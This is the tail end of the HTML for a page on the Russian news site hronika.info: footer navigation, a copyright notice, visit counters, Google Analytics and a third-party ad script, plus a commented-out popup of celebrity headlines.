              <!--noindex--><div class="fb-page" data-href="https://www.facebook.com/Hronika.info/" data-width="300" data-height="220" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/Hronika.info/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/Hronika.info/">Хроника мировых событий</a></blockquote></div><!--/noindex-->
			</div>
          
        
          <!--<div class="wrap">
            	<h3>Наш опрос</h3>
		        
			</div>
        -->
       
       		   </div>

            
  
                 
      </aside>
                      <div class="fullstory_bottom">
         <div class="bshadow">
		 
         <div class="clr"></div>
         </div>
      </div> 

        </section> 
      </div>
      <footer id="footer">
        <div class="maxw">			<nav class="footbut">
				<ul class="clr reset">
				    <li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/obwestvo/" >Общество</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/nedvizhimost/" >Недвижимость</a></li>	
					<li><a href="/videonovosti/" >Видеоновости</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>						
				</ul>					
				<ul class="clr reset">
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/kultura/" >Культура</a></li>					
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/medicina/" >Медицина</a></li>					
					<li><a href="/greenpeace/" >Гринпис</a></li>
				    <li><a href="/kriminal/" >Криминал</a></li>
					<li><a href="/igry/" >Игры</a></li>
					<li><a href="/videoigry/" >Видеоигры</a></li>					
				</ul>
			</nav>
            <a href="#"><img src="/templates/hronika/images/banners/footrekl.png" alt="Реклама" class="footrekl" /></a>
            <div class="clr5"></div>
            <div class="copyright_f"><p>Новостное интернет издание Хроника мировых событий - всегда только горячие и интересные новости со всей планеты. Все самые свежие события, происшествия, достижения и открытия мира освещаются на нашем сайте специально для вас. Копирование и использование информации с сайта Хроника инфо разрешается при условии прямой, открытой для поисковых систем гиперссылки на наш сайт. <span>hronika.info &copy; 2012-2018</span></p></div>
            <div class="counts">
            <nav class="footbut2">
            <ul class="clr5 reset">
              <li><a href="http://hronika.info/o-nas.html">О нас</a></li>
              <li><a href="http://hronika.info/sitemap.xml">Карта</a></li>
              <li><a href="http://hronika.info/vakansii.html">Вакансии</a></li>
              <li><a href="http://hronika.info/konakt.html">Контакты</a></li>
            </ul>   
            </nav>
            <!--noindex-->
              <div class="count"><!--noindex-->
<!--LiveInternet counter--><script type="text/javascript">
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t17.12;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
</script><!--/LiveInternet-->
<!--/noindex--></div>
              <div class="count"><!--noindex-->
<!-- I.UA counter --><a href="http://www.i.ua/" target="_blank" onclick="this.href='http://i.ua/r.php?165947';" title="Rated by I.UA">
<script type="text/javascript"><!--
iS='http'+(window.location.protocol=='https:'?'s':'')+
'://r.i.ua/s?u165947&p164&n'+Math.random();
iD=document;if(!iD.cookie)iD.cookie="b=b; path=/";if(iD.cookie)iS+='&c1';
iS+='&d'+(screen.colorDepth?screen.colorDepth:screen.pixelDepth)
+"&w"+screen.width+'&h'+screen.height;
iT=iR=iD.referrer.replace(iP=/^[a-z]*:\/\//,'');iH=window.location.href.replace(iP,'');
((iI=iT.indexOf('/'))!=-1)?(iT=iT.substring(0,iI)):(iI=iT.length);
if(iT!=iH.substring(0,iI))iS+='&f'+escape(iR);
iS+='&r'+escape(iH);
iD.write('<img src="'+iS+'" border="0" width="88" height="31" />');
//--></script></a><!-- End of I.UA counter -->
<!--/noindex--></div>
              <div class="count"></div>
              <div class="count"></div>
            <!--/noindex--></div>
      </footer>
      <a href="#top" id="goTop" class="go-top"><img src="/templates/hronika/images/up.png" alt="наверх" title="Подняться наверх" /></a>
      
<!-- popup     
      <div class="news-bot-show">
        <div id="dim7">
          <div class="msgbox7">
            <div class="msgboxttl7">
              <b>Материалы в разделе&nbsp;









КУЛЬТУРА










</b>
              <a class="close7">X</a>
            </div>









<div class="vsplivayushee-okno">
    <span class="spandate">12.08-12:03</span>
	<strong title="Даша Астафьева выставила напоказ пышное декольте"><a href="http://hronika.info/kultura/341530-dasha-astafeva-vystavila-napokaz-pyshnoe-dekolte.html">Даша Астафьева выставила напоказ пышное декольте</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">12.08-11:21</span>
	<strong title="Известный российский певец попался на измене"><a href="http://hronika.info/kultura/341520-izvestnyy-rossiyskiy-pevec-popalsya-na-izmene.html">Известный российский певец попался на измене</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">12.08-10:46</span>
	<strong title="Белла Хадид украсила модный глянец"><a href="http://hronika.info/kultura/341512-bella-hadid-ukrasila-modnyy-glyanec.html">Белла Хадид украсила модный глянец</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">12.08-10:05</span>
	<strong title="Похудевшая Рианна показала, как она выглядит в купальнике"><a href="http://hronika.info/kultura/341503-pohudevshaya-rianna-pokazala-kak-ona-vyglyadit-v-kupalnike.html">Похудевшая Рианна показала, как она выглядит в</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">12.08-09:18</span>
	<strong title="Настя Каменских восхитила фигурой в облегающем платье"><a href="http://hronika.info/kultura/341493-nastya-kamenskih-voshitila-figuroy-v-oblegayuschem-plate.html">Настя Каменских восхитила фигурой в облегающем</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">12.08-08:16</span>
	<strong title="Джим Керри высмеял космические планы Трампа"><a href="http://hronika.info/kultura/341484-dzhim-kerri-vysmeyal-kosmicheskie-plany-trampa.html">Джим Керри высмеял космические планы Трампа</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">12.08-06:52</span>
	<strong title="Виталий Козловский сфотографировался в самом необычном образе"><a href="http://hronika.info/kultura/341477-vitaliy-kozlovskiy-sfotografirovalsya-v-samom-neobychnom-obraze.html">Виталий Козловский сфотографировался в самом</a></strong>			
</div>















            <hr />»
            <a href="/">Перейти на главную</a>
          </div>
        </div>
      </div>
-->
      
    <div id="fb-root"></div>
      <script type="text/javascript">	
$(document).ready(function(){$("#newstab2, #listalka_tab, #rightbl_tab, #ax_popular_obs, #ax_popular_comp").easyTabs({defaultContent:1})});$(document).ready(function(){$("#slider3").tinycarousel({pager:true,interval:true})});$(document).ready(function(){$("#dim7").css("height",$(document).height());$(".alert7").click(function(){$("#dim7").fadeIn();return false});$(".close7").click(function(){$(".news-bot-show").remove();return false})});$(window).bind("resize",function(){$("#dim7").css("height",$(window).height())});
$(document).ready(function(){$("div.short_2").addClass("alt");$("div.short_2_clr:even").addClass("alt")});
    </script>
<div id="fb-root"></div>

	<script type="text/javascript" src="/templates/hronika/js/libs.js"></script>
	<script type="text/javascript" src="/templates/hronika/js/orating_pack.js"></script>
        <!--[if IE]>
	<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
	<![endif]-->
	<!--[if IE 8]><link href="/templates/hronika/css/ie8.css"  rel="stylesheet" media="all" /><![endif]-->
<script>
(function(i,s,o,g,r,a,m){i["GoogleAnalyticsObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date;a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,"script","//www.google-analytics.com/analytics.js","ga");ga("create","UA-48298212-1","hronika.info");ga("send","pageview");
</script>

<script>window.RESOURCE_O1B2L3 = 'leokross.com';</script>
<script src="//leokross.com/ED9.js" ></script>
 
 
</body>

</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
